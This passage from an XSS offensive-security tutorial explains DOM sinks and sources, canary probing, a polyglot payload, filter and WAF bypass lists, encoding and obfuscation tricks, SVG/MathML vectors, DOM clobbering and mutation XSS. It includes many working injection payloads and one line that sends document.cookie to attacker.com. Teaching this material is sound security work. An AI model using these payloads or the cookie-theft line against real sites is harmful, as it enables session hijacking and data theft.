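    // Safer: serialize with '<' escaped (e.g. replace < with \u003c on the server)
    // so the closing sequence never appears literally in the markup.
    var config = {"bio": "\u003c/script\u003e\u003cimg src=x onerror=alert(1)\u003e"};
</script>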

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Chapter 5: DOM Sinks Catalogue

A sink is where data lands and causes execution. You need to know these by heart because when you're reading JavaScript source code looking for vulnerabilities, these are the patterns your eyes should lock onto.

1. innerHTML and outerHTML — Assign a string and the browser parses it as HTML. <script> elements inserted this way are not executed, but event handler attributes on any other element (onerror, onload, onfocus, and so on) fire normally, so execution is trivial. This is the most common DOM XSS sink.

2. document.write and document.writeln — These write directly to the document stream. If called with attacker-controlled content, it can inject arbitrary HTML including <script> tags.

3. eval() — Passes a string directly to the JavaScript engine for execution. If attacker-controlled data reaches eval(), that's arbitrary JavaScript execution. Also watch for Function(), setTimeout(string, ...), and setInterval(string, ...) — they all evaluate strings as code.

4. location.href, location.assign(), location.replace() — Assigning a javascript: URI to any of these causes JavaScript execution.

5. element.src on script elements — Setting the src attribute of a dynamically created script element loads and executes an external script. If the attacker controls the URL, they load their own script file.

6. jQuery's .html(), .append(), .prepend() — These are innerHTML-equivalent in jQuery and are very common in legacy codebases. .html('<img onerror=alert(1) src=x>') executes.

7. Angular's [innerHTML] binding — Angular runs values bound this way through its built-in sanitizer (DomSanitizer) by default, which strips scripts and event handlers. The practical risk comes from developers bypassing it with bypassSecurityTrustHtml or building HTML outside Angular's binding system.

8. postMessage handlers that sink to innerHTML — A page might receive messages via window.addEventListener('message', ...) and write the received data to the DOM without validating the sender. This is a very common real-world DOM XSS pattern.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 6: DOM Sources Catalogue

A source is where attacker-controlled data enters the client-side JavaScript flow.

1. location.hash — The fragment identifier (everything after #) is never sent to the server. This makes it a stealthy source for DOM XSS that server-side scanners cannot detect and that leaves nothing in server logs. The fragment also travels with the URL, surviving reloads and copied links, so a hash-based payload fires every time the page is opened with that URL; single-page apps that route on the fragment read it constantly, which multiplies the ways it can reach a sink.

2. location.search — The query string (?key=value). Unlike location.hash, this is sent to the server, so server-side scanners can see it. But it's also used extensively by client-side routing in SPAs.

3. location.href — The full URL. If JavaScript reads location.href and processes it to extract parts, attacker-controlled portions (like the path, query, or fragment) flow in.

4. document.referrer — The URL of the page that linked to the current page. If an attacker can control where you navigate from, they can inject into document.referrer.

5. postMessage — Any origin can send a postMessage to any page. If the receiving page's message handler doesn't validate the event.origin and sinks the event.data into the DOM, the attacker can send malicious messages from their own page (see the sketch after this list).

6. localStorage and sessionStorage — If an application stores data in localStorage and later reads and sinks it into the DOM, an attacker who has written to localStorage (perhaps via a previous XSS) can create a persistent second-stage payload.

7. WebSockets — If a WebSocket server echoes back data that a client sinks into the DOM, controlling the WebSocket messages (or compromising the WebSocket server) provides an XSS vector.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Here Come the Next-Level Techniques

EXPLOITATION

Chapter 1: Payload Crafting Methodology — Start From What the Parser Sees

Every professional XSS researcher follows a mental process when approaching a new injection point. The process isn't "try payloads from a list until one works." That approach fails against any non-trivial filter and teaches you nothing. The real process is a disciplined sequence of questions, each answered by reading the parser's output rather than guessing.

Step 0: The Canary Probe

Before crafting payloads, probe with a canary — a unique, obviously harmless string that lets you locate your input in the response:

Canary: xss4test'"<>/\`

In Burp Suite, search the response for xss4test and examine surrounding context. This tells you:

a. Is my input reflected?

b. How many times?

c. What HTML context am I in?

d. Are any characters encoded?

…………………………………………………………………………………………………………………………………..

  • Step one is reconnaissance, not exploitation: Before you send a single payload, you inject a completely harmless canary string — something unique and easily grep-able, like xsstest1234 — and observe exactly where it appears in the rendered page source. You're not trying to execute anything yet. You're asking the parser: where do you put me, and in what state are you when you get there?

Right-click the page, view source (not DevTools — view raw source), and search for your canary. When you find it, read the five lines around it carefully. Are you inside a tag? Inside quotes? Inside a script block? Inside an attribute value? That surrounding context tells you which tokenizer state the parser is in when it processes your input, and that determines everything that follows.

  • Step two is probing for meaningful characters: Once you know your context, you inject each of the context-sensitive special characters one at a time and observe what the server does with them. In an HTML body context, you test < and >. In a quoted attribute, you test " or '. In a JavaScript string, you test ', ", `, \, ;, and /. You're building a map of which characters survive and which ones are stripped, encoded, or blocked. This map is your filter model.
  • Step three is deriving the minimal payload: Given your context (step one) and your filter model (step two), you now know exactly what shape your payload must take. You know which characters you have available and which you don't. You construct the smallest payload that achieves execution given those constraints. Small payloads are better for two reasons: they're less likely to hit length limits, and they're easier to reason about when something breaks.
  • Step four is cleaning up syntax: After your payload executes — even if only in a test environment — you verify that you haven't left orphaned characters that would cause a JavaScript syntax error or malformed HTML. A payload that half-executes and then throws an error is a payload that might tip off a defender or leave forensic traces. A clean payload is a professional payload.

This four-step framework replaces payload lists. Internalize it.
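A hedged sketch of step one automated: fire a canary at one parameter and print the surrounding response context so you can read the tokenizer state yourself. The target URL and parameter name are placeholders; adapt them to whatever you are testing.

// Node 18+ (global fetch). Prints every reflection of the canary with context around it.
const TARGET = 'http://localhost:3000/search';   // placeholder target
const PARAM  = 'q';
const CANARY = 'xss4test' + Math.random().toString(36).slice(2, 8);

(async () => {
    const res  = await fetch(`${TARGET}?${PARAM}=${encodeURIComponent(CANARY)}`);
    const body = await res.text();

    let idx = body.indexOf(CANARY);
    while (idx !== -1) {
        // ~80 characters on either side is usually enough to read the context.
        console.log('---\n' + body.slice(Math.max(0, idx - 80), idx + CANARY.length + 80));
        idx = body.indexOf(CANARY, idx + 1);
    }
})();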

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 2: Polyglot Payloads — One Payload, Many Contexts

A polyglot payload is a single string that executes JavaScript correctly regardless of which context it's injected into — HTML body, quoted attribute, unquoted attribute, JavaScript string, or some combination. Understanding why polyglots work requires you to hold multiple parser state machines in your head simultaneously, which is exactly the exercise that sharpens your intuition.

A polyglot is a single payload that works across multiple injection contexts simultaneously. These are invaluable for automated scanning and for when you're unsure of the context.

Why polyglots exist?

In real-world testing, you often don't immediately know which context your input lands in. A complex single-page application might process your input on the server, store it in a JSON API response, then have the client-side JavaScript pull it out and render it — and the rendering might happen in any of several contexts depending on which component handles it. A polyglot lets you fire a single test payload that will work across multiple possibilities. It also tests filters more thoroughly, because a polyglot simultaneously stresses HTML parsing, attribute parsing, and JavaScript parsing.

Let's build one from scratch, step by step: I want you to follow this construction process actively — don't just read it, trace it.

  • We want a payload that fires in at least three distinct contexts: an HTML body context, a double-quoted HTML attribute context, and a JavaScript single-quoted string context. We need to start by identifying what each context needs.
  • For the HTML body context, we need a < to transition the tokenizer out of Data state and into a tag, followed by a tag name and some execution vector. For the double-quoted attribute context, we need a " to close the attribute value first, then some execution vector. For the JavaScript single-quoted string context, we need a ' to close the string, then a statement separator, then our execution, then a comment to suppress the rest.
  • The trick with polyglots is that characters that are meaningful in one context are often harmless in another — or, more precisely, the parser in one context skips over or ignores characters that are escape sequences for another context. Here is a well-known Classic XSS Polyglot payload. Study it first.

Classic XSS Polyglot payload:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Understanding It Piece by Piece:

jaVasCript:                → Works in href, src attributes (javascript: URI)
/*-/*`/*\`/*'/*"/**/       → Attempts to close various string delimiters: ` ' "
(/* */oNcliCk=alert() )    → Injected event handler after closing JS comment
//%0D%0A%0d%0a//           → URL-encoded newlines to break out of single-line contexts
</stYle/</titLe/...        → Close various enclosing elements
\x3csVg/                   → \x3c = <, opens SVG tag
<sVg/oNloAd=alert()//>\x3e → SVG with onload handler
  • This looks overwhelming, but it's constructed deliberately. The opening jaVasCript: makes it valid as a URL scheme for href or src attributes that accept URLs — the browser normalizes casing before interpreting schemes.
  • The sequence /*-/* begins a multi-line JavaScript comment using a structure that also accounts for CSS comment syntax.
  • The backtick and various quote characters close out string contexts that the payload might have landed inside.
  • The oNcliCk=alert() is an event handler injection that works if the payload lands in an unquoted attribute or after escaping a quoted one.
  • The URL-encoded newlines %0D%0A help in contexts where a newline is needed to terminate a line comment.
  • The closing section breaks out of various tag contexts (</style>, </title>, </textarea>, </script>) that might be wrapping the injection point, and then injects an SVG element with an onload handler as the final fallback.
  • The key insight is that this payload doesn't need every part to work in every context. In a JavaScript string context, most of the HTML at the end is treated as a string that's never rendered — but the quote characters at the beginning will have already closed the string and begun execution.
  • In an HTML body context, the parser ignores the opening javascript: as text, but the <svg> near the end triggers tag parsing and the onload fires.

Polyglots are also useful as a diagnostic tool. If you inject a polyglot and something fires, you can narrow down the context by observing which part of the payload triggered.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 3: Filter Bypass Techniques — Violating the Sanitizer's Assumptions

Filters and sanitizers are written by developers who have a model of what valid and invalid input looks like. Your job as an attacker is to find inputs that the developer's model didn't account for — inputs that look safe to the sanitizer but are dangerous to the parser that processes them afterward. This gap between "what the sanitizer thinks is safe" and "what the parser actually does" is the entire attack surface for filter evasion.

1. Case Variation:

  • HTML is case-insensitive in tag names and attribute names. JavaScript event handlers defined as HTML attributes are also case-insensitive at the HTML level. So <script> and <SCRIPT> and <ScRiPt> and <sCrIpT> are all identical to the HTML parser. A naive filter that checks for the lowercase string script will miss all of these.
<!-- All of these are identical to the HTML parser -->
<SCRIPT>alert(1)</SCRIPT>
<Script>alert(1)</Script>
<sCrIpT>alert(1)</sCrIpT>

<!-- Event handlers are also case-insensitive -->
<img src=x ONERROR=alert(1)>
<img src=x OnErRoR=alert(1)>
  • The defense against this is for filters to normalize to lowercase before pattern matching. A filter that does this correctly won't be beaten by case variation alone. But case variation is always your first test because it reveals whether the developer even thought about it.

2. Null Bytes and Unusual Whitespace:

  • Some parsers and sanitizers treat null bytes (\x00) as string terminators, while the HTML parser ignores them or treats them as replacement characters. This creates a split-brain situation where the sanitizer sees scr\x00ipt as something that doesn't match script, but the HTML parser, after discarding the null byte, reconstructs script.
  • Similarly, the HTML specification allows certain whitespace characters between attributes and between a tag name and its attributes that many filters don't account for. Tab characters (\x09), newlines (\x0a), carriage returns (\x0d), and form feeds (\x0c) are all valid whitespace in HTML attribute separators:
<!-- The tab between the tag name and attribute is valid HTML -->
<img src=x onerror=alert(1)>

<!-- Newlines between attributes are valid -->
<img
src=x
onerror=alert(1)>
  • A filter that uses a regex like on\w+= to find event handlers might not account for the possibility of whitespace or other characters appearing within the attribute, or might not match across newlines.

3. Tag Substitution:

  • The <script> tag is the first thing every filter blocks. But it is far from the only way to execute JavaScript in HTML. Many filters focus so heavily on <script> that they forget the enormous ecosystem of execution-capable elements and attributes. Here are some of the alternatives, each of which works natively in modern browsers:
<!-- SVG elements support event handlers -->
<svg onload=alert(1)>
<svg><script>alert(1)</script></svg>

<!-- MathML in some browsers -->
<math><maction actiontype="statusline#" xlink:href="javascript:alert(1)">CLICK</maction></math>

<!-- Body and other structural elements have event handlers -->
<body onload=alert(1)>
<body onpageshow=alert(1)>

<!-- Input elements with autofocus force the event without user interaction -->
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>

<!-- Details and summary have a native toggle mechanism -->
<details open ontoggle=alert(1)>
<summary>Click</summary>
</details>

<!-- Video and audio elements -->
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>

<!-- The marquee element (onstart is non-standard; fires mainly in legacy IE) -->
<marquee onstart=alert(1)>test</marquee>
  • Each of these works because the HTML parser processes any element's event handler attributes and the JavaScript engine executes them when the event fires. A filter that has no specific block rule for these elements will pass them through.

4. Attribute Obfuscation and Event Handler Selection

  • When filters target specific event handler names like onerror, onload, and onclick, you have a large surface of alternatives. The HTML specification defines dozens of event handlers. Many filters enumerate a blocklist of the most common ones and miss the rest. Some less commonly blocked ones include onpointerenter, onpointerover, ontransitionend, onanimationstart, onwheel, onscroll, onresize, onpaste, oncopy, oncut, onmouseover, onsearch, and many others.
<!-- These event handlers are often not in blocklists -->
<div onpointerenter=alert(1)>hover me</div>
<div ontransitionend=alert(1) style="transition:color 1s" onmouseover="this.style.color='red'">hover</div>
<input onpaste=alert(1) placeholder="paste here">
  • The ontransitionend technique is particularly elegant: you inject an element with a CSS transition and trigger the transition with a secondary onmouseover, causing the ontransitionend to fire when the transition completes. Many WAFs don't inspect for ontransitionend.
  • Event handlers that execute without user interaction are most valuable:
<!-- Fires on page load / element load: -->
<body onload=alert(1)>
<img src=valid.jpg onload=alert(1)>
<svg onload=alert(1)>
<iframe onload=alert(1)>
<link rel=stylesheet onload=alert(1) href=valid.css>

<!-- Fires on error (use invalid src): -->
<img src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<script src=x onerror=alert(1)>

<!-- Fires automatically via HTML5 autofocus: -->
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>

<!-- Fires on animation: -->
<style>@keyframes x{}</style>
<div style="animation-name:x" onanimationstart=alert(1)>

<!-- Fires when details opens (HTML5): -->
<details open ontoggle=alert(1)>

<!-- Fires on scroll: -->
<div onscroll=alert(1) style="overflow:scroll;height:100px">
<br><br><br><br><br><br><br><br><br><br>
</div>

Bypass Category 1: Tag/Keyword Blacklisting

If <script> is blocked:

<!-- Use alternative execution tags: -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>    <!-- removed from modern browsers; legacy targets only -->
<details open ontoggle=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<iframe src="javascript:alert(1)">
<math><mtext></mtext><mglyph><svg><text><tspan><tref><foreignObject><img src=x onerror=alert(1)>

Bypass Category 2: Attribute Blacklisting

If onerror, onload, etc. are blocked:

<!-- Use less-common event handlers: -->
<body onpageshow=alert(1)>
<body onhashchange=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x>
<object data="data:text/html,<script>alert(1)</script>">
<form><button formaction="javascript:alert(1)">X</button></form>

Bypass Category 3: alert is Blocked

// Alternatives that prove execution:
prompt(1)
confirm(1)
console.log(1)
eval('ale'+'rt(1)')
window['alert'](1)
window['\x61lert'](1)
top['al'+'ert'](1)
(alert)(1)

Bypass Category 4: () Parentheses Blocked

// Using tagged template literals (ES6):
alert`1`
fetch`https://attacker.com`

// Using throw with a global error handler
// (the thrown value is delivered to the handler, so alert fires with no parentheses):
onerror=alert;throw 1

Bypass Category 5: Case-Sensitive Filter

If filter is case-sensitive:

<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x ONERROR=alert(1)>

Bypass Category 6: Space Filtering

<!-- HTML allows tab, newline, form-feed instead of spaces: -->
<img/src=x/onerror=alert(1)>
<img src=x onerror=alert(1)>    <!-- Tab characters -->
<img
src=x
onerror=alert(1)>                    <!-- Newlines -->

Bypass Category 7: Quote Filtering (' and ")

// Use backticks in JS instead of quotes:
fetch(`https://attacker.com/?c=`+document.cookie)

// String.fromCharCode:
eval(String.fromCharCode(97,108,101,114,116,40,49,41))
// = eval("alert(1)")

// Use without quotes at all in HTML attributes:
<img src=x onerror=alert(1)>   // No quotes needed here

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 4: Encoding, Obfuscation, and Evasion

Encoding is a subject where most tutorials give you a list of encoding types and call it a day. That's not what we're doing here. We're going to understand mechanically why each encoding technique works, which means understanding when the relevant decoder runs and how it interacts with the sanitizer.

The core principle that makes encoding attacks work is decoder sequencing. If a sanitizer runs before a decoder, then the sanitizer sees encoded text and the decoder later converts it to something dangerous.

The question for every encoding trick is: does the decoder that processes this type of encoding run before or after the sanitizer?

1. HTML Entity Encoding:

  • The HTML parser decodes HTML entities before passing text to the JavaScript engine. This creates an opportunity when a filter sanitizes a JavaScript context by looking for raw character patterns, but the HTML parser then decodes entities before JavaScript sees the result. Consider an injection into an event handler attribute:
<!-- All of these execute alert(1) in an event handler: -->
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=x onerror="<-- won't work in JS context -->

<!-- In href attribute: -->
<a href="javascript:alert(1)">
<a href="java&#115;cript:alert(1)">
<a href="java&#x73;cript:alert(1)">
  • Those entities decode to alert(1). A filter that looks for the string alert in the raw HTML won't see it. But the HTML parser decodes the entities before passing the attribute value to the JavaScript engine, which then executes alert(1). The decoding happens inside the browser, after your input has passed through the filter.
  • This works specifically for event handler attributes and javascript: URLs because in both of those contexts, the HTML parser decodes entities before the JavaScript engine receives the code. It does not work inside a <script> block — the content of script tags is passed to the JavaScript engine without HTML decoding, because the HTML tokenizer is in Script data state and treats the content as opaque text.

2. URL Encoding:

  • The browser decodes URL percent-encoding when processing URLs. This matters for href, src, action, and other URL-valued attributes. Percent-encoding in the body of a javascript: URL (everything after the scheme) is decoded before the JavaScript executes, so javascript:%61lert(1) runs alert(1). The scheme itself is not percent-decoded by the browser, so j%61vascript: only helps when the application URL-decodes the input before writing it into the attribute — which is exactly what happens when a server decodes a query parameter and reflects it. Whether any of this bypasses a filter depends heavily on whether the filter decodes before pattern matching, which better filters do.
  • Double URL encoding takes this further: %2522 is %25 (the encoded percent sign) followed by 22; one round of decoding yields %22, and a second round yields ". This is useful in scenarios where an application decodes a URL once on the server and then uses the result in a context where it's decoded again. A small decode demonstration follows the snippet below.
javascript:alert(1)
javascript:%61lert(1)     // 'a' URL-encoded in the URL body — decoded before execution
j%61vascript:alert(1)     // only works if the application decodes before reflecting
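A quick way to convince yourself of the double-decoding arithmetic (plain JavaScript, runnable in any console):

// %2522 → one decode → %22 → second decode → "
const once  = decodeURIComponent('%2522');   // "%22"
const twice = decodeURIComponent(once);      // '"'
console.log(once, twice);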

3. Unicode Normalization:

  • JavaScript identifiers support Unicode, and many Unicode "lookalike" characters collapse into their ASCII equivalents when something in the pipeline performs Unicode normalization (typically NFKC, applied by application code, server-side frameworks, or platform APIs rather than by the JavaScript engine itself). This means a filter that blocks the ASCII string alert might not block a version of alert whose characters have been replaced with fullwidth or other compatibility equivalents that normalize back to ASCII downstream.
  • More practically, some browsers (historically IE was the worst offender) would normalize Unicode in ways that turned otherwise-safe sequences into dangerous ones. This is the foundation of mXSS, which we'll cover shortly.
// Unicode Escapes in JavaScript
// In a JS context, these are equivalent:
alert(1)
\u0061lert(1)
\u{61}lert(1)

4. UTF-7 Encoding:

  • This is largely a historical technique that affected Internet Explorer when servers sent responses without a Content-Type charset declaration. IE would sniff the encoding and could be tricked into interpreting a page as UTF-7, in which +ADw- decodes to < and +AD4- decodes to >. An XSS payload in UTF-7 encoding looks like:
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
  • Modern browsers require an explicit charset declaration, but this technique appears in older write-ups and sometimes in legacy applications, so you should recognize it.

5. Base64 in Data URIs:

  • The data: URI scheme lets you embed content directly in a URL. In combination with Base64 encoding and the text/html MIME type, you can construct a URL that contains a complete HTML page with a script. If this URL ends up in an href, src, or iframe src, clicking or loading it executes the embedded JavaScript:
<!-- This data URI contains a base64-encoded HTML page with an alert -->
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  • The Base64 decodes to <script>alert(1)</script>. Whether this works depends on the browser's same-origin treatment of data: URIs (modern browsers sandbox them) and whether the context allows data: URLs. It's most relevant in older browsers and in specific iframe or object contexts.

6. Mixed Encoding:

  • The most sophisticated encoding bypass combines multiple encoding layers in the correct sequence, exploiting the fact that different decoders run at different stages of processing. For example, in a javascript: href, you can HTML-encode the characters that the sanitizer looks for, and the browser will HTML-decode the attribute value before processing the URL, which it then URL-decodes before handing to the JavaScript engine. Each layer of decoding happens at a different stage, and a sanitizer that only decodes once before pattern-matching will miss the attack.
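Here's a small sketch of those two layers in action — purely illustrative, runnable in a browser console; the attribute value is what a once-decoding sanitizer would inspect:

// Layer 1: the HTML parser decodes the &#106; entity when it parses the attribute
const attrValue = '&#106;avascript:%61lert(1)';            // what the sanitizer inspects
const href = new DOMParser()
    .parseFromString('<a href="' + attrValue + '">x</a>', 'text/html')
    .querySelector('a').getAttribute('href');               // "javascript:%61lert(1)"

// Layer 2: the javascript: URL body is percent-decoded before the JS engine runs it
const jsBody = decodeURIComponent(href.slice('javascript:'.length));  // "alert(1)"
console.log(href, jsBody);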

7. JavaScript Obfuscation Techniques:

JavaScript obfuscation transforms readable code into a harder-to-understand form while preserving functionality. Here's an overview of the main techniques:

// JSFuck - encode any JS using only 6 chars: []()!+
// alert(1) in JSFuck:
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+...

// Hex encoding:
\x61\x6c\x65\x72\x74\x28\x31\x29

// Constructor-based:
(()=>{})['constructor']('alert(1)')()
Function('alert(1)')()

// toString radix tricks:
(10)['toString'](36)                         // = 'a'
(10)['toString'](36) + (21)['toString'](36) + (14)['toString'](36) +
(27)['toString'](36) + (29)['toString'](36)  // = 'alert', built char by char

Variable & Function Renaming:

  • Replace meaningful names with short, meaningless identifiers.
// Before
function calculateTotalPrice(items, taxRate) {
  return items.reduce((sum, item) => sum + item.price, 0) * (1 + taxRate);
}

// After
function _0x3f(a, b) {
  return a.reduce((_c, _d) => _c + _d.price, 0) * (1 + b);
}

String Encoding & Encryption

  • Hide string literals using encoding schemes.
// Before
console.log("Hello, World!");

// After (Base64 / charCode arrays)
console.log(atob("SGVsbG8sIFdvcmxkIQ=="));

// Or using charCode array
console.log(String.fromCharCode(72,101,108,108,111,44,32,87,111,114,108,100,33));

String Array Mapping

  • Store all strings in a central array and reference by index.
// Obfuscated
var _s = ["log", "Hello", "World"];
console[_s[0]](_s[1] + ", " + _s[2]);

Control Flow Flattening

  • Restructure logic into a switch inside a while loop, hiding the original execution order.
// Before
function greet(name) {
  const msg = "Hello, " + name;
  console.log(msg);
  return msg;
}

// After
function greet(name) {
  var _step = "0|1|2".split("|"), _i = 0;
  while (true) {
    switch (_step[_i++]) {
      case "0": var msg = "Hello, " + name; continue;
      case "1": console.log(msg); continue;
      case "2": return msg;
    }
    break;
  }
}

Dead Code Injection

  • Insert unreachable or meaningless code to confuse readers.
function _noise() {
  if (false) { var x = Math.random() * 99; x++; }
  var _junk = [1,2,3].map(n => n * 0);
}
// Sprinkled throughout to bloat and confuse

Eval-Based Execution

  • Encode the entire script and execute it via eval.
eval(atob("Y29uc29sZS5sb2coJ0hlbGxvIScpOw=="));
// Decodes and runs: console.log('Hello!');

Property Access Obfuscation

  • Replace dot notation with computed bracket notation.
// Before
console.log("test");
window.location.href = "/";

// After
window["con"+"sole"]["l"+"og"]("test");
window["loca"+"tion"]["hr"+"ef"] = "/";

Number & Boolean Obfuscation

  • Replace literals with equivalent expressions.
// Before
let x = 1;
let flag = true;

// After
let x = +!![];           // 1
let flag = !![];         // true
let zero = +[];          // 0
let two = +!![] + +!![]; // 2 (the same trick JSFuck is built on)

Self-Defending Code

  • Code that detects tampering or formatting attempts and breaks itself.
// Shipped minified on a single line; if a deobfuscator pretty-prints the code,
// the function's own source gains newlines and the check throws
(function(){var check=function(){if(/\r|\n/.test(check.toString())){throw new Error("tampered");}};check();})();

Key Takeaway

Obfuscation is not security — it raises the bar for reverse engineering but doesn't prevent it. Determined attackers can always deobfuscate client-side JS. Use it alongside server-side validation, auth, and proper secrets management.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 5: SVG, MathML, and Template Injection

1. SVG (Scalable Vector Graphics):

  • SVG is an XML-based format that browsers render as part of the DOM. It has its own scripting capabilities:
<!-- Basic SVG XSS -->
<svg><script>alert(1)</script></svg>
<svg onload=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>

<!-- SVG with use tag + external resource (now largely blocked) -->
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x">

<!-- SVG inside HTML vs XML context behaves differently -->
<!-- In HTML context: -->
<svg>
  <foreignObject>
    <div xmlns="http://www.w3.org/1999/xhtml">
      <script>alert(1)</script>
    </div>
  </foreignObject>
</svg>
  • Why is SVG special for bypasses? SVG has its own namespace and parser. Sanitizers that work on HTML may not correctly handle SVG's XML-based parsing rules.

2. MathML:

<math>
  <mtext>
    <mglyph>
      <svg>
        <script>alert(1)</script>
      </svg>
    </mglyph>
  </mtext>
</math>

<!-- MathML namespace confusion exploits -->
<math><mtext><table><mglyph><style></mtext><img src=x onerror=alert(1)></style>

3. Server-Side Template Injection (SSTI) → XSS Bridge:

When server-side templates render user input, SSTI can lead to XSS. This is a different class of vulnerability but often produces XSS as a symptom:

# Jinja2 (Python/Flask):
Input: {{7*7}}
Output: 49         ← Template evaluated!

# For XSS via SSTI:
{{"".__class__.__mro__[1].__subclasses__()}}
# → Escalates to RCE, not just XSS

# Angular template injection (client-side):
{{constructor.constructor('alert(1)')()}}

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 6: DOM Clobbering

DOM Clobbering is one of the most sophisticated XSS techniques. It exploits the fact that HTML elements with id or name attributes automatically create properties on the window or document object.

The Core Mechanic:

<!-- Named HTML elements become window properties: -->
<input id="username">
<script>
  console.log(window.username); // Returns the <input> element!
  console.log(username);        // Same — global lookup falls back to window
</script>

Exploiting DOM Clobbering:

Consider this vulnerable code pattern:

// Application code uses a config object:
let config = window.config || {};
let sinkUrl = config.scriptUrl || '/default.js';
document.querySelector('#loader').src = sinkUrl;

An attacker can inject:

<a id="config"><a id="config" name="scriptUrl" href="javascript:alert(1)">
  • window.config → an HTMLCollection containing both <a id="config"> elements
  • window.config.scriptUrl → the second <a> (matched via its name attribute), which stringifies to its href → "javascript:alert(1)"

More Complex DOM Clobbering:

<!-- Clobber nested properties with form + input: -->
<form id="x"><input id="y" value="javascript:alert(1)"></form>

<!-- Now: window.x.y → input element, window.x.y.value → "javascript:alert(1)" -->

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 7: Mutation XSS (mXSS) — When the Browser Itself Creates the Vulnerability

This is one of the most subtle and fascinating XSS classes, because the vulnerability isn't in the server's code and it isn't in the application's JavaScript — it's in the browser's HTML serialization and re-parsing behavior. Understanding it requires you to think carefully about the difference between the DOM and its string representation.

The core mechanism:

  • Many sanitizer libraries work by parsing a string of HTML into a DOM tree, removing dangerous elements and attributes from the tree, and then serializing the cleaned tree back into a string using innerHTML or a similar serialization method. The assumption is that the serialized output is equivalent to the parsed input — that nothing dangerous can be introduced by the round-trip. Mutation XSS breaks this assumption.
  • The key insight is that the HTML parser is more permissive than the serializer is strict. The parser can accept certain malformed or ambiguous HTML structures and build a DOM tree from them. When that DOM tree is serialized back to HTML, the serialized form — generated by the browser's own serializer — may not match the original input. And in some cases, the serialized output contains a structure that, when parsed a second time, produces a different DOM tree that includes executable JavaScript.
  • Let me make this concrete. Consider a sanitizer that takes input, parses it into a DOM tree to clean it, and then reads element.innerHTML to get the cleaned HTML string. Here's a classic mXSS vector that exploited this in older versions of browser engines:
<!-- Attacker input: a malformed table structure containing a script-like element -->
<table><tbody><tr><td><noscript><p></noscript><img src=x onerror=alert(1)></td></tr></tbody></table>

What happens is this:

  • The parser sees the <noscript> element. In a context where scripting is disabled, the content of <noscript> is parsed as HTML. In a context where scripting is enabled, the content of <noscript> is treated as raw text (similar to script data state).
  • Depending on which mode the sanitizer's parser runs in versus what mode the actual page's parser runs in, the <img onerror> element may be inert during sanitization but then active when the sanitized HTML is rendered on the page.
  • A more direct example of the serialization mutation issue involves namespace-switching between HTML and SVG/MathML. The content model rules differ significantly between HTML mode and SVG mode. An element that's a CDATA section in SVG namespace becomes raw text in HTML namespace. Consider:
<!-- Inside an SVG context, this is CDATA (safe) -->
<svg><script>alert(1)</script></svg>

<!-- But inside HTML, <title> content is raw text (also safe on its own) -->
<!-- However, when parsed in SVG namespace and then serialized back: -->
<svg><title><a href="</title><img onerror=alert(1)>
  • The SVG parser in namespace mode might parse this differently than the HTML serializer re-emits it, producing a mutation. The sanitizer sees a safe tree. The serialized output, parsed a second time by the HTML parser, reconstructs a dangerous tree.

Why this matters for you:

  • You will encounter sanitizer libraries in real applications. Knowing that mXSS exists means you know to probe for it by testing inputs that play with namespace switches, table parsing contexts, and elements like <noscript>, <template>, <textarea>, and <title> that have unusual content parsing rules. Tools like DOMPurify have been hardened against many known mXSS vectors, but new ones are still discovered in browser engines and sanitizer implementations. Finding a new mXSS is a high-severity, often novel finding.

How It Works:

Attacker Input  →  Sanitizer  →  "Safe" HTML String  →  innerHTML  →  Browser Parses  →  MUTATION  →  XSS

The Key Insight:

When you assign a string to innerHTML, the browser's HTML parser processes it. The resulting DOM may be different from what you set. This is "mutation."
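A practical way to hunt for mutation candidates is to compare a string against its own parse-serialize round trip: if innerHTML isn't idempotent on your input, the markup mutates and is worth testing against sanitizers that rely on innerHTML round-trips. A minimal browser-console sketch (the candidate string is the SVG/title example from above):

// Parse a candidate string into a detached element, then read back the
// browser's own serialization of it
function roundTrip(html) {
    const container = document.createElement('div');
    container.innerHTML = html;     // parse
    return container.innerHTML;     // serialize
}

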